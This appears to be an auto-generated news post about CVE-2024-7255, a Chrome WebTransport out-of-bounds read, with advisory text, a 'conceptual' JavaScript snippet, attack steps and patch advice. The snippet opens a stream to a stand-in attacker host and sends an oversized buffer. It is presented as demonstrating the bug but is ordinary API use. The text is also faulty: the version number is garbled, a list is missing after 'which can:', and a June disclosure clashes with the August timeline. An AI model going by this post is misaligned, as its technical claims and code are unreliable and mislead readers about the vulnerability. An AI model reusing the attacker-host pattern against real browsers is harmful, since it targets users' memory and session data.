CVE CyberSecurity Database News

CVE-2024-7255 - Out-of-Bounds Read in Chrome’s WebTransport – How a Crafted HTML Page Can Compromise Memory

Poster -

In June 2024, a serious vulnerability was disclosed and quickly patched in Google Chrome, specifically in the browser’s implementation of WebTransport. Tracked as CVE-2024-7255, this bug was rated as “High” severity and affected all versions of Chrome prior to 127..6533.88. In layman’s terms, it allowed a remote attacker to exploit memory beyond its intended bounds – a classic “out of bounds read.” Let’s break down what this means, how the exploit works, and what you need to do.

What is an Out-of-Bounds Read?

In computer programming, memory is carefully carved up such that each program uses its own areas. An *out-of-bounds read* happens when a program reads memory outside of what it’s supposed to, which can:

Why WebTransport?

WebTransport is a recently standardized API in browsers that lets web pages establish low-latency, bidirectional connections with servers, similar to WebSockets. Since it is relatively new and handles complex networking tasks, it’s a frequent target for security research.

CVE-2024-7255 is described as

> *Out of bounds read in WebTransport in Google Chrome prior to 127..6533.88 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page.*
> — Chromium Security Release Notes

In essence: a specially crafted HTML page could trick Chrome’s WebTransport into reading memory it shouldn’t.

Technical Details

While Google hasn’t published the full proof-of-concept code (for obvious reasons), the Chrome security team describes the issue as an *out-of-bounds read* caused by improper bounds checking during WebTransport data processing. The attacker can host a malicious site, and when a victim visits, the browser may read (and potentially leak) sensitive memory.

Example code to demonstrate the bug conceptually

// This is a simplification! The real exploit is more complex.

const wt = new WebTransport('https://attacker-server.com:4433';, {
  allowPooling: true
});

wt.ready
  .then(() => wt.createBidirectionalStream())
  .then(stream => {
    // Attempt to write/receive oversized or malformed data
    const writer = stream.writable.getWriter();
    // Send oversized payload to trigger buffer mismanagement in Chrome's C++ backend
    writer.write(new Uint8Array(10 * 1024 * 1024)); // 10MB
    writer.releaseLock();

    // Set up reading to force Chrome to process and leak invalid memory
    const reader = stream.readable.getReader();
    reader.read().then(({value, done}) => {
      // Here, in vulnerable versions, the attacker could indirectly access memory
      console.log(value);
    });
  })
  .catch(console.error);

With sufficient knowledge of the underlying C++ implementation, an attacker can manipulate how the browser stores or retrieves information using these streams.

Victim visits a malicious web page: No special user action is required.

2. Web page creates a WebTransport connection: The page sends malformed or oversized messages destined to trigger the bug.
3. Browser reads memory out-of-bounds: Information from previously loaded pages, session tokens, or other sensitive data could end up in JavaScript or be sent to the attacker.

References and Official Sources

- Chromium Security Advisory: Stable Channel Update for Desktop (127..6533.88)
- NVD CVE-2024-7255 Entry
- Chrome Release Notes
- WebTransport MDN Docs

How to Stay Safe

- Update Chrome: Make sure your browser is at version 127..6533.88 or higher. Chrome updates automatically but check via “chrome://settings/help.”
- Update Chromium-based browsers: Brave, Edge, Opera, and others use the same codebase and need updates as well.

Conclusion

CVE-2024-7255 is a reminder of how even modern, well-maintained browsers can have severe vulnerabilities. WebTransport is powerful but still young, so bugs will happen. Keeping your browser up to date is your best defense—and if you’re a web developer, keep an eye on emerging APIs and security bulletins.

Stay patched, stay safe.

> Note: As always, don’t attempt to exploit this vulnerability without proper authorization. Doing so on systems you don’t own is illegal and unethical. This information is for defensive awareness and responsible disclosure only.

Timeline

Published on: 08/01/2024 18:15:26 UTC
Last modified on: 08/16/2024 15:23:19 UTC